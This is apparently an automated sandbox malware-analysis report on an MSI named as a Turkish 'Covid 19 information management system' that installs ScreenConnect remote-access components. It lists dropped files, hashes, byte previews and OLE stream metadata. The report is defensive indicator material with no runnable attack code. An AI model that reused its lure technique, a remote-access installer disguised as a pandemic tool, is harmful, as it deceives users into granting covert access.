                                                                                                                                              Preview: ................................................................................x................................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................=y..+..... .....\w.8............S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.x.......H.......................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl
                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):65536
                                                                                                                                              Entropy (8bit):0.11244931577493461
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:sTXm/Ey6q9995Vwz1miM3qQ10nMCldimE8eawHza1miIW/:sKl68X41tMLyMCldzE9BHza1tIW/
                                                                                                                                              MD5:EA4E520D2B1AD2AEE73B2E643A8FBC5D
                                                                                                                                              SHA1:050955188B1721DFDB841B4AE01BC223C5F1441A
                                                                                                                                              SHA-256:942F4247F5FC832B4DD7911E308EDF98961BEA059A2010215EF5D1AE6416264C
                                                                                                                                              SHA-512:CB03393E76BB6027DC3E9B56D46B1A289348C1A09B8498F12575339B2B427B8621F5DE30660518322BB7C28B646D9C750DEE5A7447C851CA3C31D328F84F2E76
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: ................................................................................x.......i........................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................=y..+..... .....?).8............U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.x.......e.......................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):65536
                                                                                                                                              Entropy (8bit):0.11239089332243332
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:0Xm/Ey6q9995VwKQ1mK2P3qQ10nMCldimE8eawHza1mKL:9l68X41iPLyMCldzE9BHza1v
                                                                                                                                              MD5:4FD2871714D4C4C3282112FE43C73FB8
                                                                                                                                              SHA1:662A69888B7ACB605284C93DB3B26AA11CE99D04
                                                                                                                                              SHA-256:0A739942CC02E967984D723F4C8A7CB8AC7252F15605125425C41BC45E5B7BA2
                                                                                                                                              SHA-512:A729269147426F92F8F150679F8C8952776B91F8E7A55B701893AFEB14BA6B24DC54C33574953B9A0448E06452BF8C037CFFE81D2C1C1124194EAA9ADFD9E22E
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: ................................................................................x................................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................=y..+..... ........8............U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.x........?......................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp
                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):358220
                                                                                                                                              Entropy (8bit):7.038308444386438
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:4UUG777hkC5042Hq5Le17n0NnaApOqdro6Tf8EgDiCtr8PXcXm/Gt9To:4UUa/hkusHq561ANnbpOqJcDiio4T9To
                                                                                                                                              MD5:61AFDA050ACA43D3C2D47BAC055E5A79
                                                                                                                                              SHA1:A51AB1F361A542AA843A17E1C5F199FD67666915
                                                                                                                                              SHA-256:4B9C2218FE7ABE964684123115487A0B5260B45E842F1F660BFA22C7F5D5E55D
                                                                                                                                              SHA-512:221463DEE13434592065DDCA9DE14F57384C1C709BA2FFBA37B02E76BC0BBD87C3CB3E18CB6545ACD5F536322C0D844229D33E01B797917A5C8D41024EBF2ADA
                                                                                                                                              Malicious:false
                                                                                                                                              Antivirus:
                                                                                                                                              • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.c.2.0.2.0.2.0..|0.2.0..H0.2.0.Jq0.2.0.2.0.2.0..I0.2.0..y0.2.0..x0.2.0...0.2.0Rich.2.0................PE..L...9..P...........!.........H.......i.......................................p............@..............................*..l...x....@.......................P..d.......................................@...............h............................text............................... ..`.rdata..............................@..@.data....-..........................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp-\CustomAction.config
                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                              File Type:XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):228
                                                                                                                                              Entropy (8bit):5.069688959232011
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:JiMVBdTMkI002VymRMT4/0xko57VrzW57VNQeuAW4QIT:MMHd41p2VymhsbOF93xT
                                                                                                                                              MD5:EB99EE012EB63C162EEBC1DF3A15990B
                                                                                                                                              SHA1:D48FD3B3B942C754E3588D91920670C087FCE7E9
                                                                                                                                              SHA-256:C5045C2D482F71215877EB668264EE47E1415792457F19A5A55651C3554CC7CD
                                                                                                                                              SHA-512:455EC01953EC27186FBEAD17C503B7F952474A80B41E986494697497ECEAB130AD81A5561373D6762B71EEC473D8E37CDE742F557E50233F7EB0E8FB8B0BE4AD
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: .<?xml version="1.0" encoding="utf-8" ?>..<configuration>...<startup useLegacyV2RuntimeActivationPolicy="true">....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>..</configuration>
                                                                                                                                              C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):176128
                                                                                                                                              Entropy (8bit):5.775360792482692
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3072:FkfZS7FUguxN+77b1W5GR69UgoCaf8TpCnfKlRUjW01Ky4:x+c7b1W4R6joxfQE
                                                                                                                                              MD5:5EF88919012E4A3D8A1E2955DC8C8D81
                                                                                                                                              SHA1:C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
                                                                                                                                              SHA-256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
                                                                                                                                              SHA-512:4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
                                                                                                                                              Malicious:false
                                                                                                                                              Antivirus:
                                                                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                              Joe Sandbox View:
                                                                                                                                              • Filename: PE0kEcDX6e.exe, Detection: malicious, Browse
                                                                                                                                              • Filename: ZqCMVecKCy.exe, Detection: malicious, Browse
                                                                                                                                              • Filename: BlueJeansInstaller.exe, Detection: malicious, Browse
                                                                                                                                              • Filename: CluuMailManagement.5.3.0.exe, Detection: malicious, Browse
                                                                                                                                              • Filename: BlueJeansInstaller.exe, Detection: malicious, Browse
                                                                                                                                              • Filename: BlueJeans.2.25.11u.msi, Detection: malicious, Browse
                                                                                                                                              • Filename: aloha.msi, Detection: malicious, Browse
                                                                                                                                              • Filename: , Detection: malicious, Browse
                                                                                                                                              • Filename: Inteq.ClientSetup.exe, Detection: malicious, Browse
                                                                                                                                              • Filename: , Detection: malicious, Browse
                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ......~.... ........... ..............................!|....@.................................,...O.................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp-\ScreenConnect.Core.dll
                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):431104
                                                                                                                                              Entropy (8bit):5.994818287083215
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:NmYWp08U90BrFRIDfhQ0LKEkF40ftMH8+UFshE4H/bx+TZx4kBPM89PK:NeNJRH0OEm402G4+
                                                                                                                                              MD5:562D0082DD2A4A596B954D7CF95A8AFD
                                                                                                                                              SHA1:1BE225003E6F3D6E8DB2EE718090D9DFB8568C4E
                                                                                                                                              SHA-256:9DA51FDA94377313C04026A4E558B47B8E65B48CCC58392CCBB123552FFE1B68
                                                                                                                                              SHA-512:E9BDF5AA59663DF1DA45DCF8B64F85BB67527670C81B1FEAA0887EA93ECAFA248AE4D65F5CE581B3D6D89C6113581A448237D86E008F79C1136BA763B7487457
                                                                                                                                              Malicious:false
                                                                                                                                              Antivirus:
                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C............." ..0.............f.... ........... ..............................m.....@.....................................O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................H.......H...............................x.........................................{5...*..{6...*V.(7.....}5.....}6...*...0..;........uW.....,/(8....{5....{5...o9...,.(:....{6....{6...o;...*.*. ... )UU.Z(8....{5...o<...X )UU.Z(:....{6...o=...X*.0..b........r...p......%..{5......%qZ....Z...-.&.+...Z...o>....%..{6......%q[....[...-.&.+...[...o>....(?...*..{@...*..{A...*V.(7.....}@.....}A...*.0..;........u\.....,/(8....{@....{@...o9...,.(:....{A....{A...o;...*.*. F.b# )UU.Z(8....{@...o<
                                                                                                                                              C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp-\ScreenConnect.InstallerActions.dll
                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):17920
                                                                                                                                              Entropy (8bit):4.994773269652144
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:kDKSTolrSKlr1aNdeFarMx61kjvfU5ydogbz/:kOSTolmKlkWFjY5y5bz
                                                                                                                                              MD5:3BBE58076065375A9D3CD97A33057001
                                                                                                                                              SHA1:9EC3784E855621403299A33083DD7CF3B7339722
                                                                                                                                              SHA-256:67F5DEE146B09D2489DE4E839C0A7CF62CE04735E9898559B5A45A92921A9EAA
                                                                                                                                              SHA-512:D919643E2455778952E39B11E366920BE68347AFAECC0F90C9F875D8A305C3E1FA87B395943B69D95548108CB05EDF68E1873C261B135F440C08F78DC56EF3D5
                                                                                                                                              Malicious:false
                                                                                                                                              Antivirus:
                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'h..........." ..0..>.........."\... ...`....... ....................................@..................................[..O....`...............................[............................................... ............... ..H............text...(<... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B.................\......H.......4-......................4[.......................................0..........s.......}.....s....}.....{....r...p(......9.....{....r...p......%...(.....rS..p.(....~....%-.&~..........s....%.....(...+~....%-.&~..........s....%.....(...+.......s....(...+&.{....o....-!.{.....{.....{....rc..po....(.....{....o.........{.....{.....{....r}..po....(.....{....o....-..{....r...p......(.....*.{....s......o....,..o....-..{....r}..p.o.....*..o ....-..(!...o"....{....r}..p.(#...o....
                                                                                                                                              C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):55
                                                                                                                                              Entropy (8bit):4.306461250274409
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                              C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                                                                                              Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:modified
                                                                                                                                              Size (bytes):906
                                                                                                                                              Entropy (8bit):3.146210479116215
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:58KRBubdpkoF1AG3rcIyidDk9+MlWlLehB4yAq7ejC/IyidO:OaqdmuF3rcwY+kWReH4yJ7MUwO
                                                                                                                                              MD5:C5B7A3795835ACC8E99D40F784AA25DF
                                                                                                                                              SHA1:021842726310690FFFCA30509EB9BBD05C01F4A1
                                                                                                                                              SHA-256:C2DB8E7C89CBC70D4C0DBC53E01025C429BDFFABC6D51C99A93651D1587AC26A
                                                                                                                                              SHA-512:E6DB97BBFF4787AB0D01DBDCC6A4F3D9BCA8B70BF476E1751D49AC2F2A739D034552C24C2755AE13D775D597FAB0027F6F30BA47D71596E4530439B734818408
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: ........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. F.e.b. .. 1.9. .. 2.0.2.1. .1.2.:.3.2.:.3.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. F.r.i. .. F.e.b. .. 1.9. .. 2.0.2.1. .1.2.:.3.2.:.3.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

                                                                                                                                              Static File Info

                                                                                                                                              General

                                                                                                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {8A934279-D590-44CF-A9B7-FCB60CC980BB}, Create Time/Date: Fri Jan 29 20:29:00 2021, Last Saved Time/Date: Fri Jan 29 20:29:00 2021, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                                                                              Entropy (8bit):7.679244272362368
                                                                                                                                              TrID:
                                                                                                                                              • Microsoft Windows Installer (77509/1) 63.77%
                                                                                                                                              • ClickyMouse macro set (36024/1) 29.64%
                                                                                                                                              • Generic OLE2 / Multistream Compound File (8008/1) 6.59%
                                                                                                                                              File name:Covid 19 bilgi y#U00f6netim sistemi.msi
                                                                                                                                              File size:1892352
                                                                                                                                              MD5:1f365aa75ff0d2806a2269d238208593
                                                                                                                                              SHA1:440ef2dfdd778ec159cd6babc60e2b70252d661f
                                                                                                                                              SHA256:3dbe3682f5d3db8cd0d8c0586d3c345a458f274355a4dac2edd05f25092423a8
                                                                                                                                              SHA512:7af947f6d1a5620e69dced0a6d0b7766699e06cbb51dd49cf9e979775c5ae102db984bf5f4e9d612add6682c7dd69e854cc4403ae3c2e8b1bcb47b0c0c579686
                                                                                                                                              SSDEEP:49152:o1wzZMQTrfO4i8SrzmWoRjetXGuhVNnkscno81g:t9Tr24frPe1GyVNfE
                                                                                                                                              File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                              File Icon

                                                                                                                                              Icon Hash:a2a0b496b2caca72

                                                                                                                                              Static OLE Info

                                                                                                                                              General

                                                                                                                                              Document Type:OLE
                                                                                                                                              Number of OLE Files:1

                                                                                                                                              OLE File "Covid 19 bilgi y#U00f6netim sistemi.msi"

                                                                                                                                              Indicators

                                                                                                                                              Has Summary Info:True
                                                                                                                                              Application Name:Windows Installer XML Toolset (3.11.0.1701)
                                                                                                                                              Encrypted Document:False
                                                                                                                                              Contains Word Document Stream:False
                                                                                                                                              Contains Workbook/Book Stream:False
                                                                                                                                              Contains PowerPoint Document Stream:False
                                                                                                                                              Contains Visio Document Stream:False
                                                                                                                                              Contains ObjectPool Stream:
                                                                                                                                              Flash Objects Count:
                                                                                                                                              Contains VBA Macros:False

                                                                                                                                              Summary

                                                                                                                                              Code Page:1252
                                                                                                                                              Title:Installation Database
                                                                                                                                              Subject:Default
                                                                                                                                              Author:ScreenConnect Software
                                                                                                                                              Keywords:Default
                                                                                                                                              Comments:Default
                                                                                                                                              Template:Intel;1033
                                                                                                                                              Revion Number:{8A934279-D590-44CF-A9B7-FCB60CC980BB}
                                                                                                                                              Create Time:2021-01-29 20:29:00
                                                                                                                                              Last Saved Time:2021-01-29 20:29:00
                                                                                                                                              Number of Pages:200
                                                                                                                                              Number of Words:2
                                                                                                                                              Creating Application:Windows Installer XML Toolset (3.11.0.1701)
                                                                                                                                              Security:2

                                                                                                                                              Streams

                                                                                                                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 456
                                                                                                                                              General
                                                                                                                                              Stream Path:\x5SummaryInformation
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:456
                                                                                                                                              Entropy:4.42079571287
                                                                                                                                              Base64 Encoded:True
                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . I n s t a l l a t i o n D a t a b a s e . . . . . . . . . . . D e f a u l t . . . . . . . . . S c r e e n C o n n e c t S o f t w a r e . .
                                                                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 01 00 00 0e 00 00 00 01 00 00 00 78 00 00 00 02 00 00 00 80 00 00 00 03 00 00 00 a0 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 d0 00 00 00 06 00 00 00 e0 00 00 00 07 00 00 00 f0 00 00 00 09 00 00 00 04 01 00 00 0c 00 00 00 34 01 00 00
                                                                                                                                              Stream Path: \x16786\x17522\x15230\x17000\x17956\x17903\x16786\x17522, File Type: MS Windows icon resource - 3 icons, 16x16 withPNG image data, 16 x 16, 8-bit colormap, non-interlaced, 4 bits/pixel, 32x32 withPNG image data, 32 x 32, 1-bit colormap, non-interlaced, 4 bits/pixel, Stream Size: 435
                                                                                                                                              General
                                                                                                                                              Stream Path:\x16786\x17522\x15230\x17000\x17956\x17903\x16786\x17522
                                                                                                                                              File Type:MS Windows icon resource - 3 icons, 16x16 withPNG image data, 16 x 16, 8-bit colormap, non-interlaced, 4 bits/pixel, 32x32 withPNG image data, 32 x 32, 1-bit colormap, non-interlaced, 4 bits/pixel
                                                                                                                                              Stream Size:435
                                                                                                                                              Entropy:5.28973478021
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . z . . . 6 . . . . . . . . . . . . . . . . . 0 0 . . . . . . . . . . 0 . . . . P N G . . . . . . . . I H D R . . . . . . . . . . . . . ( - . S . . . . P L T E . . . . 2 2 . u . . . . . . t R N S . @ . . f . . . " I D A T x . c ` . 0 " . . . $ . ( . . . . . . S C . . Q 8 . . . . 9 b . i . X a . . . . . I E N D . B ` . . P N G . . . . . . . . I H D R . . . . . . . . . . . I . . . . . . . P L T E . . . . 2 2 . u . . . . . . t R N S . @ . . f . . . ( I D A T x . c ` . . . .
                                                                                                                                              Data Raw:00 00 01 00 03 00 10 10 00 00 00 00 04 00 7a 00 00 00 36 00 00 00 20 20 00 00 00 00 04 00 80 00 00 00 b0 00 00 00 30 30 00 00 00 00 04 00 83 00 00 00 30 01 00 00 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 10 08 03 00 00 00 28 2d 0f 53 00 00 00 06 50 4c 54 45 00 00 00 cc 32 32 18 75 d3 1a 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 22 49 44 41 54 78 da
                                                                                                                                              Stream Path: \x16909\x16681\x17400\x18359\x16678\x18469, File Type: Microsoft Cabinet archive data, 1197508 bytes, 11 files, Stream Size: 1241783
                                                                                                                                              General
                                                                                                                                              Stream Path:\x16909\x16681\x17400\x18359\x16678\x18469
                                                                                                                                              File Type:Microsoft Cabinet archive data, 1197508 bytes, 11 files
                                                                                                                                              Stream Size:1241783
                                                                                                                                              Entropy:7.98354702392
                                                                                                                                              Base64 Encoded:True
                                                                                                                                              Data ASCII:M S C F . . . . . E . . . . . . L . . . . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . B F . . . . . . l . . . . . . . 2 . . . . . . . . T . . . . . . . . = R . { . S c r e e n C o n n e c t . C l i e n t . d l l . . z . . . T . . . . = R . { . S c r e e n C o n n e c t . C l i e n t S e r v i c e . d l l . . . . . . . . . . . = R . { . S c r e e n C o n n e c t . C o r e . d l l . . . . . . b . . . . = R . { . S c r e e n C o n n e c t . W i n d o w s . d l l . P . . . . ~ $ . . .
                                                                                                                                              Data Raw:4d 53 43 46 00 00 00 00 c4 45 12 00 00 00 00 00 4c 00 00 00 00 00 00 00 03 01 05 00 0b 00 00 00 00 00 00 00 12 02 00 00 5a 00 03 15 ae 97 11 00 03 00 03 15 42 46 12 00 02 00 00 00 6c e6 12 00 01 00 00 00 32 ef 12 00 01 00 00 00 00 54 02 00 00 00 00 00 00 00 3d 52 99 7b 20 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 43 6c 69 65 6e 74 2e 64 6c 6c 00 00 7a 00 00 00 54 02 00 00 00 3d
                                                                                                                                              Stream Path: \x17163\x16689\x18229\x15166\x17848\x17591\x15024\x17894\x17580\x15729\x16748\x16693\x18229, File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive, Stream Size: 358220
                                                                                                                                              General
                                                                                                                                              Stream Path:\x17163\x16689\x18229\x15166\x17848\x17591\x15024\x17894\x17580\x15729\x16748\x16693\x18229
                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                              Stream Size:358220
                                                                                                                                              Entropy:7.03830844439
                                                                                                                                              Base64 Encoded:True
                                                                                                                                              Data ASCII:M Z . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . L . ! T h i s p r o g r a m c a n n o t b e r u n i n D O S m o d e . . . . $ . . . . . . . . S . c . 2 . 0 . 2 . 0 . 2 . 0 . . | 0 . 2 . 0 . . H 0 . 2 . 0 . J q 0 . 2 . 0 . 2 . 0 . 2 . 0 . . I 0 . 2 . 0 . . y 0 . 2 . 0 . . x 0 . 2 . 0 . . . 0 . 2 . 0 R i c h . 2 . 0 . . . . . . . . . . . . . . . . P E . . L . . . 9 . . P . . . . . . . . . . . !
                                                                                                                                              Data Raw:4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
                                                                                                                                              Stream Path: \x17163\x16689\x18229\x16446\x18156\x14988, File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, Stream Size: 207360
                                                                                                                                              General
                                                                                                                                              Stream Path:\x17163\x16689\x18229\x16446\x18156\x14988
                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                              Stream Size:207360
                                                                                                                                              Entropy:6.5733484375
                                                                                                                                              Base64 Encoded:True
                                                                                                                                              Data ASCII:M Z . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . L . ! T h i s p r o g r a m c a n n o t b e r u n i n D O S m o d e . . . . $ . . . . . . . . . A F . . / . . . / . . . / . ' D . . . . / . ' D . . . . / . ' D . . . . / . . . , . . . / . . . + . . . / . . . * . . . / . . . . . . . / . . . . . . . / . . . . . n . / . * . * . . . / . * . / . . . / . * . . . . . / . . . . . . . / . * . - . . . / .
                                                                                                                                              Data Raw:4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
                                                                                                                                              Stream Path: \x18496\x15167\x17394\x17464\x17841, File Type: data, Stream Size: 1160
                                                                                                                                              General
                                                                                                                                              Stream Path:\x18496\x15167\x17394\x17464\x17841
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:1160
                                                                                                                                              Entropy:4.94650484427
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . " . " . " . ) . ) . ) . * . * . * . + . + . , . , . 1 . 1 . 5 . 5 . 5 . 5 . 5 . 5 . ; . ; . ; . C . C . G . G . G . G . G . W . W . \\ . \\ . \\ . \\ . \\ . \\ . \\ . \\ . k . k . o . o . o . o . o . o . o . o . } . } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
